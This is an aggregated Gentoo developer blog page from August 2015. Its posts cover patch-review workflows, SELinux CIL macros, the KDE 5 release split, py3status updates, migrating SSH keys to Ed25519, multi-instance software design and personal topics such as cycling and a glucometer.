Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
September 01, 2015, 13:06 UTC

Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.

Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

August 31, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Critical Mass Berlin: Closing the gaps (August 31, 2015, 22:52 UTC)


I have been participating with Critical Mass Berlin a few times now. Simplified, it’s a few hours running a bike through the city with all street lights green by definition, except for those people running the head. It goes a few rounds at Siegessäule sometimes, has gone through Tempelhofer Feld before. It’s a few hours of being free, of a new view on the city, it’s time with friends if you bring or make some. There are some problems though. I have seen cyclists falling, pedestrians falling while trying to cross the street, both drunk and sober, cars driving into cyclists, drivers getting out and starting a fight until nearby police joins in, a few insane cyclists running the wrong lane.

One event shifted my perspective last time: Shit, I get why some are so pissed about it. It was my first time corking a street — the process of blocking cars so they do not run into cyclists by accident. I was running near the head at the time, heard someone shouting “corking!” as a call for help and found myself standing in front of a car. And so I stood there, four of us. I was lucky, the car people were a lot friendlier than what I had observed with others’ corkings before. The car I was blocking was delivering pizza. Maybe when blocked everyone is a doctor or delivering pizza or living close by, but I believe he actually was. There was no end of bikes in sight. When the end seemed in sight, it turned out to not be the end, and then again. There were gaps and gaps and gaps again. Why?! To me on the inside, it started to become embarrassing. I should have used a stop watch, to know if my perception tricked me — it seemed like an eternity. With more and more people joining Critical Mass, waiting gets longer, no fix for that. But why gaps, why? Even says “Die Masse bleibt zusammen”, the mass remains as one body. What’s so hard about it? If I was sitting in a car, waiting for a stream of racing bikes to let go of the road would make sense. But drops of cyclists going as it was for shopping — how are they supposed to sit still and silent to that? Does it have to be that big of a “fuck you” to them? Things could go a lot more smoothly. Maybe I get it wrong, maybe its is a “fuck cars” ride for most but my perception so far was that it’s not: it’s people who like to ride their bikes, like to have fun, rather than an aggressive statement. The presence of so many is a statement by itself. Maybe it is statement enough?

When you participate with Critical Mass next time, I ask you to close the gaps, leading by example, and asking those around you to join closing the gaps, and to give it some speed. Without the wind in your face, you’re missing the best part.

Thank you!

August 29, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Patches and Plaid (August 29, 2015, 12:33 UTC)

This is part of the better tools series.

Sometimes you should question the tools you are using and try to see if there is something better out there. Or build it yourself.

Juggling patches

It is quite common when interacting with people to send back and forth the changes to the shared codebase you are working on.

This post tries to analyze two commonly used models and explain why they can be improved and which are the good tools for it (existing or not).

The two models

The focus is on git, github-like web-mediated pull-requests and mailinglist-oriented workflows.

The tools in use are always:

  • a web browser
  • an editor
  • a shell
  • an email client

Some people might have all in one in a way or another making one of the two model already incredibly more effective. Below I assume you do not have such tightly integrated environments.

Pull requests

Github made quite easy to propose patches in the form of ephemeral branches that can be reviewed and merged with a single click on your browser.

The patchset can be part of your master tree or a brand new branch pushed on your repository for this purpose: first you push your changes on github and then you go to your browser to send the PullRequest (also known as merge request or proposed changeset).

You can get email notification that a pull request is available and then move to your browser to review it.

You might have a continuous integration report out of it and if you trust it you may skip fetching the changes and test them locally.

If something does not work exactly as it should you can notify the proponents and they might get an email that they have comments and they have to go to the browser to see them in detail.

Then the changes have to be pushed to the right branch and github helpfully updates it.

Then the reviewer has to get back to the browser and check again.

Once that is done you have your main tree with lots of merge artifacts and possibly some fun time if you want to bisect the history.

Mailing-list mediated

The mailing-list mediated is sort of popular because Linux does use it and git does provide tools for it out of box.

Once you have a set of patches (say 5) you are happy with you can simply issue

git send-email --compose -5 --to

And if you have a local mailer working that’s it.

If you do not you end up having to configure it (e.g. configuring gmail with a specific access token not to have to type the password all the time is sort of easy)

The people in the mailing-list then receive your set in their mailbox as is and they can use git-am to test it (first saving the thread using their email client then using git am over it) locally and push to something like oracle if they like the set but they aren’t completely sure it won’t break everything.

If they have comments can just reply to the specific patch email (using the email Message-Id).

The proponent can then rework the set (maybe using git rebase -i) and send an update and add some comments here and there.

git send-email --annotate -6 --to

Updates to specific patches or rework from other people can happen by just sending the patch back.

git send-email --annotate -1 --in-reply-to patch-msgid

Once the set is good, it can be applied to the tree, resulting in a purely linear history that makes going over looking for regression pretty easy.

Where to improve

Pull request based

The weak and the strong point of this method is its web-centricity.

It works quite nicely if you just use the web-mail so is just switching from a tab to another to see exactly what’s going on and reply in detail.

Yet, if your browser isn’t your shell (and you didn’t configure custom actions to auto-fetch the pull requests) you still have lots of back and forth.

Having already continuous integration hooks you can quickly configure is quite nice if the project has already a solid regression and code coverage harness so the reviewer bourden to make sure the code doesn’t break is lighter.

Sending a link to a pull request is easy.

Sadly, new code does not come with tests or tests you should trust the whole point above is half moot: you have to do the whole fetch&test dance.

Reworking sets isn’t exactly perfect, it makes quite hard to a third party to provide input in form of an alternate patch over a set:

  • you have to fetch the code being discussed
  • prepare a new pull request
  • reference it in your comment to the old one


  • the initial proponent has to fetch it
  • rebase his branch on it
  • update the pull request accordingly

and so on.

There are desktop-tools trying to bridge web and shell but right now they aren’t an incredible improvement and the churn during the review can be higher on the other side.

Surely is really HARD to forget a pull request open.

Mailing list based

The strong point of the approach is that you have less steps for the most common actions:

  • sending a set is a single command
  • fetching a set is two commands
  • doing a quick review does not require to switch to another application, you just
    reply to the email you received.
  • sending an update or a different approach is always the same git send-email command

It is quite loose so people can have various degrees of integration, but in general the experience as reviewer is as good as your email client, your experience as proponent is as nice as your sendmail configuration.

People with basic email client would even have problems referring to patches by its Message-Id.

The weakest point of the method is the chance of missing a patch, leaving it either unreviewed or uncommitted after the review.

Ideal situation

My ideal solution would include:

  • Not many compulsory steps, sending a patch for a habitual contributor should take the least amount of time.

  • A pre-screening of patches, ideally making sure the new code has tests and it passes them on some testing environments.

  • Reviewing should take the least amount of time.

  • A mean to track patches and make easy to know if a set is still pending review or it is committed.

Enters plaid

I do enjoy better using the mailing-list approach since it is much quicker for me, I have a decent email client (that still could improve) and I know how to configure my local smtp. If I want to contribute to a new project that uses the approach it is just a matter to find the email address and type git send-email --annotate --to email, github gets unwieldy if I just want to send a couple of fixes.

That said I do see that the mailing-list shortcomings are a limiting factor and while I’m not much concerned as making the initial setup much easier (since federico has already plans for it), I do want to not lose patches and to get some of the nice and nifty features github has without losing the speed in development I do enjoy.

Plaid is my try to improve the situation, right now it is just more or less an easier to deploy patch tracker along the lines of patchwork with a diverging focus.

It emphasizes the concepts of patch tag to provide quick grouping, patch series to ease reviewing a set.

curl | git am -s

Is all you need to get all the patches in your working tree.

Right now it works either as stand-alone tracker (right now this test deploy is fed by fetching from the mailing list archives) or as mailbox hook (as patchwork does).

Coming soon

I plan to make it act as postfix filter, so it injects in the email an useful link to the patch. It will provide a mean to send emails directly from it so it can doubles as nicer email client for those that are more web-centric and gets annoyed because gmail and the likes aren’t good for the purpose.

More views such as a per-submitter view and a search view will appear as well.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Doing away with interfaces (August 29, 2015, 09:30 UTC)

CIL is SELinux' Common Intermediate Language, which brings on a whole new set of possibilities with policy development. I hardly know CIL but am (slowly) learning. Of course, the best way to learn is to try and do lots of things with it, but real-life work and time-to-market for now forces me to stick with the M4-based refpolicy one.

Still, I do try out some things here and there, and one of the things I wanted to look into was how CIL policies would deal with interfaces.

Recap on interfaces

With the M4 based reference policy, interfaces are M4 macros that expand into the standard SELinux rules. They are used by the reference policy to provide a way to isolate module-specific code and to have "public" calls.

Policy modules are not allowed (by convention) to call types or domains that are not defined by the same module. If they want to interact with those modules, then they need to call the interface(s):

# module "ntp"
# domtrans: when executing an ntpd_exec_t binary, the resulting process 
#           runs in ntpd_t
  domtrans_pattern($1, ntpd_exec_t, ntpd_t)

# module "hal"

In the above example, the purpose is to have hald_t be able to execute binaries labeled as ntpd_exec_t and have the resulting process run as the ntpd_t domain.

The following would not be allowed inside the hal module:

domtrans_pattern(hald_t, ntpd_exec_t, ntpd_t)

This would imply that both hald_t, ntpd_exec_t and ntpd_t are defined by the same module, which is not the case.

Interfaces in CIL

It seems that CIL will not use interface files. Perhaps some convention surrounding it will be created - to know this, we'll have to wait until a "cilrefpolicy" is created. However, functionally, this is no longer necessary.

Consider the myhttp_client_packet_t declaration from a previous post. In it, we wanted to allow mozilla_t to send and receive these packets. The example didn't use an interface-like construction for this, so let's see how this would be dealt with.

First, the module is slightly adjusted to create a macro called myhttp_sendrecv_client_packet:

(macro myhttp_sendrecv_client_packet ((type domain))
  (typeattributeset cil_gen_require domain)
  (allow domain myhttp_client_packet_t (packet (send recv)))

Another module would then call this:

(call myhttp_sendrecv_client_packet (mozilla_t))

That's it. When the policy modules are both loaded, then the mozilla_t domain is able to send and receive myhttp_client_packet_t labeled packets.

There's more: namespaces

But it doesn't end there. Whereas the reference policy had a single namespace for the interfaces, CIL is able to use namespaces. It allows to create an almost object-like approach for policy development.

The above myhttp_client_packet_t definition could be written as follows:

(block myhttp
  ; MyHTTP client packet
  (type client_packet_t)
  (roletype object_r client_packet_t)
  (typeattributeset client_packet_type (client_packet_t))
  (typeattributeset packet_type (client_packet_t))

  (macro sendrecv_client_packet ((type domain))
    (typeattributeset cil_gen_require domain)
    (allow domain client_packet_t (packet (send recv)))

The other module looks as follows:

(block mozilla
  (typeattributeset cil_gen_require mozilla_t)
  (call myhttp.sendrecv_client_packet (mozilla_t))

The result is similar, but not fully the same. The packet is no longer called myhttp_client_packet_t but myhttp.client_packet_t. In other words, a period (.) is used to separate the object name (myhttp) and the object/type (client_packet_t) as well as interface/macro (sendrecv_client_packet):

~$ sesearch -s mozilla_t -c packet -p send -Ad
  allow mozilla_t myhttp.client_packet_t : packet { send recv };

And it looks that namespace support goes even further than that, but I still need to learn more about it first.

Still, I find this a good evolution. With CIL interfaces are no longer separate from the module definition: everything is inside the CIL file. I secretly hope that tools such as seinfo would support querying macros as well.

August 28, 2015
Michael Palimaka a.k.a. kensington (homepage, bugs)


For those that are not already aware, KDE’s release structure has evolved. The familiar all-in-one release of KDE SC 4 has been split into three distinct components, each with their own release cycles – KDE Frameworks 5, KDE Plasma 5, and KDE Applications 5.

This means there’s no such thing as KDE 5!

KDE Frameworks 5

KDE Frameworks 5 is a collection of libraries upon which Plasma and Applications are built. Each framework is distinct in terms of functionality, allowing consumers to depend on smaller individual libraries. This has driven adoption in other Qt-based projects such as LXQt as they no longer have to worry about “pulling in KDE”.

We ship the latest version of KDE Frameworks 5 in the main tree, and plan to target it for stabilisation shortly.

KDE Plasma 5

KDE Plasma 5 is the next generation of the Plasma desktop environment. While some might not consider it as mature as Plasma 4, it is in a good state for general use and is shipped as stable by a number of other distributions.

We ship the latest version of KDE Plasma 5 in the main tree, and would expect to target it for stabilisation within a few months.

KDE Applications 5

KDE Applications 5 consists of the remaining applications and supporting libraries. Porting is gradual process, with each new major release containing more KF5-based and fewer KDE 4-based packages.

Unfortunately, current Applications releases are not entirely coherent – some packages have features that require unreleased dependencies, and some cannot be installed at the same time as others. This situation is expected to improve in future releases as porting efforts progress.

Because of this, it’s not possible to ship KDE Applications in its entirety. Rather, we are in the process of cherry-picking known-good packages into the main tree. We have not discussed any stabilisation plan yet.


As Frameworks are just libraries, they are automatically pulled in as required by consuming packages, and no user intervention is required.

To upgrade to Plasma 5, please follow the upgrade guide. Unfortunately it’s not possible to have both Plasma 4 and Plasma 5 installed at the same time, due to an upstream design decision.

Applications appear in the tree as a regular version bump, so will upgrade automatically.

Ongoing KDE 4 support

Plasma 4 has reached end-of-life upstream, and no further releases are expected. As per usual, we will keep it for a reasonable time before removing it completely.

As each Applications upgrade should be invisible, there’s less need to retain old versions. It is likely that the existing policy of removing old shortly after stabilisation will continue.

What is this 15.08.0 stuff, or, why is it upgrading to KDE 5?

As described above, Applications are now released separately from Plasma, following a versioning scheme. This means that, regardless of whether they are KDE 4 or KF5-based, they will work correctly in both Plasma 4 and Plasma 5, or any other desktop environment.

It is the natural upgrade path, and there is no longer a “special relationship” between Plasma and Applications the way there was in KDE SC 4.


As always, feedback is appreciated – especially during major transitions like this. Sharing your experience will help improve it for the next person, and substantial improvements have already been made made thanks to the contributions of early testers.

Feel free to file a bug, send a mail, or drop by #gentoo-kde for a chat any time. Thanks for flying Gentoo KDE!

August 27, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.6 (August 27, 2015, 17:04 UTC)

Ok I was a bit too hasty in my legacy module support code clean up and I broke quite a few things on the latest version 2.5 release sorry ! :(


  • make use of pkgutil to detect properly installed modules even when they are zipped in egg files (manual install)
  • add back legacy modules output support (tuple of position / response)
  • new uname module inspired from issue 117 thanks to @ndalliard
  • remove dead code

thanks !

  • @coelebs on IRC for reporting, testing and the good spirit :)
  • @ndalliard on github for the issue, debug and for inspiring the uname module
  • @Horgix for responding to issues faster than me !

August 25, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Slowly converting from GuideXML to HTML (August 25, 2015, 09:30 UTC)

Gentoo has removed its support of the older GuideXML format in favor of using the Gentoo Wiki and a new content management system for the main site (or is it static pages, I don't have the faintest idea to be honest). I do still have a few GuideXML pages in my development space, which I am going to move to HTML pretty soon.

In order to do so, I make use of the guidexml2wiki stylesheet I developed. But instead of migrating it to wiki syntax, I want to end with HTML.

So what I do is first convert the file from GuideXML to MediaWiki with xsltproc.

Next, I use pandoc to convert this to restructured text. The idea is that the main pages on my devpage are now restructured text based. I was hoping to use markdown, but the conversion from markdown to HTML is not what I hoped it was.

The restructured text is then converted to HTML using In the end, I use the following function (for conversion, once):

# Convert GuideXML to RestructedText and to HTML
gxml2html() {

  # Convert to Mediawiki syntax
  xsltproc ~/dev-cvs/gentoo/xml/htdocs/xsl/guidexml2wiki.xsl $1 > ${basefile}.mediawiki

  if [ -f ${basefile}.mediawiki ] ; then
    # Convert to restructured text
    pandoc -f mediawiki -t rst -s -S -o ${basefile}.rst ${basefile}.mediawiki;

  if [ -f ${basefile}.rst ] ; then
    # Use your own stylesheet links (use full https URLs for this)  --stylesheet=link-to-bootstrap.min.css,link-to-tyrian.min.css --link-stylesheet ${basefile}.rst ${basefile}.html

Is it perfect? No, but it works.

August 24, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

It seems I forgot to forward this when it blew my mind the first time. If you still need a reason to not download binaries from http:// URLs, this is it:

The Case of the Modified Binaries

While SourceForge is another story, they are an example of a website offering binaries through plain http://, e.g. Oh my.

August 22, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Making the case for multi-instance support (August 22, 2015, 10:45 UTC)

With the high attention that technologies such as Docker, Rocket and the like get (I recommend to look at Bocker by Peter Wilmott as well ;-), I still find it important that technologies are well capable of supporting a multi-instance environment.

Being able to run multiple instances makes for great consolidation. The system can be optimized for the technology, access to the system limited to the admins of said technology while still providing isolation between instances. For some technologies, running on commodity hardware just doesn't cut it (not all software is written for such hardware platforms) and consolidation allows for reducing (hardware/licensing) costs.

Examples of multi-instance technologies

A first example that I'm pretty familiar with is multi-instance database deployments: Oracle DBs, SQL Servers, PostgreSQLs, etc. The consolidation of databases while still keeping multiple instances around (instead of consolidating into a single instance itself) is mainly for operational reasons (changes should not influence other database/schema's) or technical reasons (different requirements in parameters, locales, etc.)

Other examples are web servers (for web hosting companies), which next to virtual host support (which is still part of a single instance) could benefit from multi-instance deployments for security reasons (vulnerabilities might be better contained then) as well as performance tuning. Same goes for web application servers (such as TomCat deployments).

But even other technologies like mail servers can benefit from multiple instance deployments. Postfix has a nice guide on multi-instance deployments and also covers some of the use cases for it.

Advantages of multi-instance setups

The primary objective that most organizations have when dealing with multiple instances is the consolidation to reduce cost. Especially expensive, propriatary software which is CPU licensed gains a lot from consolidation (and don't think a CPU is a CPU, each company has its (PDF) own (PDF) core weight table to get the most money out of their customers).

But beyond cost savings, using multi-instance deployments also provides for resource sharing. A high-end server can be used to host the multiple instances, with for instance SSD disks (or even flash cards), more memory, high-end CPUs, high-speed network connnectivity and more. This improves performance considerably, because most multi-instance technologies don't need all resources continuously.

Another advantage, if properly designed, is that multi-instance capable software can often leverage the multi-instance deployments for fast changes. A database might be easily patched (remove vulnerabilities) by creating a second codebase deployment, patching that codebase, and then migrating the database from one instance to another. Although it often still requires downtime, it can be made considerably less, and roll-back of such changes is very easy.

A last advantage that I see is security. Instances can be running as different runtime accounts, through different SELinux contexts, bound on different interfaces or chrooted into different locations. This is not an advantage compared to dedicated systems of course, but more an advantage compared to full consolidation (everything in a single instance).

Don't always focus on multi-instance setups though

Multiple instances isn't a silver bullet. Some technologies are generally much better when there is a single instance on a single operating system. Personally, I find that such technologies should know better. If they are really designed to be suboptimal in case of multi-instance deployments, then there is a design error.

But when the advantages of multiple instances do not exist (no license cost, hardware cost is low, etc.) then organizations might focus on single-instance deployments, because

  • multi-instance deployments might require more users to access the system (especially when it is multi-tenant)
  • operational activities might impact other instances (for instance updating kernel parameters for one instance requires a reboot which affects other instances)
  • the software might not be properly "multi-instance aware" and as such starts fighting for resources with its own sigbling instances

Given that properly designed architectures are well capable of using virtualization (and in the future containerization) moving towards single-instance deployments becomes more and more interesting.

What should multi-instance software consider?

Software should, imo, always consider multi-instance deployments. Even when the administrator decides to stick with a single instance, all that that takes is that the software ends up with a "single instance" setup (it is much easier to support multiple instances and deploy a single one, than to support single instances and deploy multiple ones).

The first thing software should take into account is that it might (and will) run with different runtime accounts - service accounts if you whish. That means that the software should be well aware that file locations are separate, and that these locations will have different access control settings on them (if not just a different owner).

So instead of using /etc/foo as the mandatory location, consider supporting /etc/foo/instance1, /etc/foo/instance2 if full directories are needed, or just have /etc/foo1.conf and /etc/foo2.conf. I prefer the directory approach, because it makes management much easier. It then also makes sense that the log location is /var/log/foo/instance1, the data files are at /var/lib/foo/instance1, etc.

The second is that, if a service is network-facing (which most of them are), it must be able to either use multihomed systems easily (bind to different interfaces) or use different ports. The latter is a challenge I often come across with software - the way to configure the software to deal with multiple deployments and multiple ports is often a lengthy trial-and-error setup.

What's so difficult with using a base port setting, and document how the other ports are derived from this base port. Neo4J needs 3 ports for its enterprise services (transactions, cluster management and online backup), but they all need to be explicitly configured if you want a multi-instance deployment. What if one could just set baseport = 5001 with the software automatically selecting 5002 and 5003 as other ports (or 6001 and 7001). If the software in the future needs another port, there is no need to update the configuration (assuming the administrator leaves sufficient room).

Also consider the service scripts (/etc/init.d) or similar (depending on the init system used). Don't provide a single one which only deals with one instance. Instead, consider supporting symlinked service scripts which automatically obtain the right configuration from its name.

For instance, a service script called pgsql-inst1 which is a symlink to /etc/init.d/postgresql could then look for its configuration in /var/lib/postgresql/pgsql-inst1 (or /etc/postgresql/pgsql-inst1).

Just like supporting .d directories, I consider multi-instance support an important non-functional requirement for software.

August 21, 2015
Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
GUADEC 2015 (August 21, 2015, 06:21 UTC)

This one’s a bit late, for reasons that’ll be clear enough later in this post. I had the happy opportunity to go to GUADEC in Gothenburg this year (after missing the last two, unfortunately). It was a great, well-organised event, and I felt super-charged again, meeting all the people making GNOME better every day.

GUADEC picnic @ Gothenburg

I presented a status update of what we’ve been up to in the PulseAudio world in the past few years. Amazingly, all the videos are up already, so you can catch up with anything that you might have missed here.

We also had a meeting of PulseAudio developers which and a number of interesting topics of discussion came up (I’ll try to summarise my notes in a separate post).

A bunch of other interesting discussions happened in the hallways, and I’ll write about that if my investigations take me some place interesting.

Now the downside — I ended up missing the BoF part of GUADEC, and all of the GStreamer hackfest in Montpellier after. As it happens, I contracted dengue and I’m still recovering from this. Fortunately it was the lesser (non-haemorrhagic) version without any complications, so now it’s just a matter of resting till I’ve recuperated completely.

Nevertheless, the first part of the trip was great, and I’d like to thank the GNOME Foundation for sponsoring my travel and stay, without which I would have missed out on all the GUADEC fun this year.

Sponsored by GNOME!

Sponsored by GNOME!

August 19, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Switching OpenSSH to ed25519 keys (August 19, 2015, 16:26 UTC)

With Mike's news item on OpenSSH's deprecation of the DSA algorithm for the public key authentication, I started switching the few keys I still had using DSA to the suggested ED25519 algorithm. Of course, I wouldn't be a security-interested party if I did not do some additional investigation into the DSA versus Ed25519 discussion.

The issue with DSA

You might find DSA a bit slower than RSA:

~$ openssl speed rsa1024 rsa2048 dsa1024 dsa2048
                  sign    verify    sign/s verify/s
rsa 1024 bits 0.000127s 0.000009s   7874.0 111147.6
rsa 2048 bits 0.000959s 0.000029s   1042.9  33956.0
                  sign    verify    sign/s verify/s
dsa 1024 bits 0.000098s 0.000103s  10213.9   9702.8
dsa 2048 bits 0.000293s 0.000339s   3407.9   2947.0

As you can see, RSA verification outperforms DSA in verification, while signing with DSA is better than DSA. But for what OpenSSH is concerned, this speed difference should not be noticeable on the vast majority of OpenSSH servers.

So no, it is not the speed, but the secure state of the DSS standard.

The OpenSSH developers find that ssh-dss (DSA) is too weak, which is followed by various sources. Considering the impact of these keys, it is important that they follow the state-of-the-art cryptographic services.

Instead, they suggest to switch to elliptic curve cryptography based algorithms, with Ed25519 and Curve25519 coming out on top.

Switch to RSA or ED25519?

Given that RSA is still considered very secure, one of the questions is of course if ED25519 is the right choice here or not. I don't consider myself anything in cryptography, but I do like to validate stuff through academic and (hopefully) reputable sources for information (not that I don't trust the OpenSSH and OpenSSL folks, but more from a broader interest in the subject).

Ed25519 should be written fully as Ed25519-SHA-512 and is a signature algorithm. It uses elliptic curve cryptography as explained on the EdDSA wikipedia page. An often cited paper is Fast and compact elliptic-curve cryptography by Mike Hamburg, which talks about the performance improvements, but the main paper is called High-speed high-security signatures which introduces the Ed25519 implementation.

Of the references I was able to (quickly) go through (not all papers are publicly reachable) none showed any concerns about the secure state of the algorithm.

The (simple) process of switching

Switching to Ed25519 is simple. First, generate the (new) SSH key (below just an example run):

~$ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/testuser/.ssh/id_ed25519): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/testuser/.ssh/id_ed25519.
Your public key has been saved in /home/testuser/.ssh/
The key fingerprint is:
SHA256:RDaEw3tNAKBGMJ2S4wmN+6P3yDYIE+v90Hfzz/0r73M testuser@testserver
The key's randomart image is:
+--[ED25519 256]--+
|o*...o.+*.       |
|*o+.  +o ..      |
|o++    o.o       |
|o+    ... .      |
| +     .S        |
|+ o .            |
|o+.o . . o       |
|oo+o. . . o ....E|
| oooo.     ..o+=*|

Then, make sure that the ~/.ssh/authorized_keys file contains the public key (as generated as Don't remove the other keys yet until the communication is validated. For me, all I had to do was to update the file in the Salt repository and have the master push the changes to all nodes (starting with non-production first of course).

Next, try to log on to the system using the Ed25519 key:

~$ ssh -i ~/.ssh/id_ed25519 testuser@testserver

Make sure that your SSH agent is not running as it might still try to revert back to another key if the Ed25519 one does not work. You can validate if the connection was using Ed25519 through the auth.log file:

~$ sudo tail -f auth.log
Aug 17 21:20:48 localhost sshd[13962]: Accepted publickey for root from \ port 43152 ssh2: ED25519 SHA256:-------redacted----------------

If this communication succeeds, then you can remove the old key from the ~/.ssh/authorized_keys files.

On the client level, you might want to hide ~/.ssh/id_dsa from the SSH agent:

# Obsolete - keychain ~/.ssh/id_dsa
keychain ~/.ssh/id_ed25519

If a server update was forgotten, then the authentication will fail and, depending on the configuration, either fall back to the regular authentication or fail immediately. This gives a nice heads-up to you to update the server, while keeping the key handy just in case. Just refer to the old id_dsa key during the authentication and fix up the server.

August 18, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
New glucometer: LifeScan OneTouch Verio (August 18, 2015, 23:16 UTC)

I have visited LifeScan's website and I noticed that their homepage is suggesting people with glucometers of the OneTouch Ultra series to upgrade to a new series. The reason for the change is purported to be found in new regulations on quality and precision of glucometers, but I could not find any reference for it.

As usual, this is a free upgrade – glucometer manufacturers are generally happy to send you a free meter, since they make most of the money on the testing strips instead – so I ordered one, and I received it (or rather picked it up) this Monday. It's a OneTouch Verio.

The first impression is that it's a very bad match for my previous Ultra Mini: it's big and clunky. The whole case is about twice as big in volume. For me, as I travel a lot, this is a bit of a problem.

On the bright side, this is the first meter that I own that is not powered by CR2032 button cells. This model uses AAA batteries, which not only are much simpler to source, but are already always present in my luggage, as my noise-cancelling headphones uses the same. I also bought a 40-pack of them last time I've been to Fry's.

Also, while the upgrade from OneTouch Ultra 2 to Ultra Mini maintained the same set of testing strips, the Verio comes with a new strip type. This puts it into the same bucket as the Abbott Precision Xtra in my perception, which also requires a different set of testing strips. The reason why I consider those the same is that they both have "costs" associated with the change in strips. In particular since I already have two meters (actually, three if I count the one that is set to Italian readings), which means I can keep one at home and one at the office.

Similarly to the Abbott device, and unlike the Ultras, the new strips are not coded — it makes sense since the Ultra strips also have had the same code – 25 – for the past four years. This is good because at least once every two weeks I have to draw a second sample of blood because I put the first one too soon, before the meter accepted the code. These strips also require less blood than the old ones, and even less than the Abbott strips. Funnily enough, I never got in Europe the "new" Ultra strips I've used in the USA before, which require about half the blood as the standard European strips. Go figure.

Also most obvious difference in these trips is that they load blood on the side rather than the tip. I'm not sure why, but I like it — it feels like it's less likely to get ruined when you shake the strip bottle.

New meter also means new protocols of course. Unfortunately, LifeScan already refused sending me the protocol of this device, which once again puts it into the same category as Abbott's. Interestingly enough, unlike both Abbott and the old Ultras, this device has a standard microUSB connection. Unfortunately by default it shows up as a mass-storage device with exactly one file in it: a redirect to the LifeScan website. I assume the software (which I have not installed yet) will modeswitch it to serial somehow and then proceed from there. If I had enough time I'd be setting up my Windows laptop for logging USB traffic and try to reverse engineer both this and Abbott's protocol.

Funnily enough there is another meter, called OneTouch Verio Flex only available in Ireland, which has bluetooth connectivity. Whereas there's the Verion Sync in the USA, which syncs with an iPhone app (no Android app, though.) I wonder if I should call them up and see if I can get myself one of those as well; it uses the same strips and would solve my problem of having more than one meter using the same stash of strips.

The meter also came with the new "OneTouch Delica" lancing system. Once again the same that was true of the meter is true of the system: it uses a new type of lancets, which is something that not even the Abbott device did. Indeed I have some four lancing devices that share the same kind of lancets already, and they even fit each other case, mostly, as they usually only have an elastic loop to fit on.

Comparatively, I'm happier about the new lancing device than I am about the meter. Not only the lancet is finer, which hurts significantly less – but would not work well with the old strips' need of blood – but exactly as they promise on the website the new device does not vibrate, which also makes for a less painful experience.

In my experience, pricking your finger multiple times a day is the most painful side effect of the light diabetes I have, so reducing that pain has a quite significant improvement in my daily quality of life.

All in all, I'm happy that there are improvements always going on... I just wish the improvement went towards reducing the size of the device as well as improving its precision and information.

August 17, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.5 (August 17, 2015, 15:05 UTC)

This new py3status comes with an amazing number of contributions and new modules !

24 files changed, 1900 insertions(+), 263 deletions(-)

I’m also glad to say that py3status becomes my first commit in the new git repository of Gentoo Linux !


Please note that this version has deprecated the legacy implicit module loading support to favour and focus on the generic i3status order += module loading/ordering !

New modules

  • new aws_bill module, by Anthony Brodard
  • new dropboxd_status module, by Tjaart van der Walt
  • new external_script module, by Dominik
  • new nvidia_temp module for displaying NVIDIA GPUs’ temperature, by J.M. Dana
  • new rate_counter module, by Amaury Brisou
  • new screenshot module, by Amaury Brisou
  • new static_string module, by Dominik
  • new taskwarrior module, by James Smith
  • new volume_status module, by Jan T.
  • new whatismyip module displaying your public/external IP as well as your online status


As usual, full changelog is available here.


Along with all those who reported issues and helped fixed them, quick and surely not exhaustive list:

  • Anthony Brodard
  • Tjaart van der Walt
  • Dominik
  • J.M. Dana
  • Amaury Brisou
  • James Smith
  • Jan T.
  • Zopieux
  • Horgix
  • hlmtre

What’s next ?

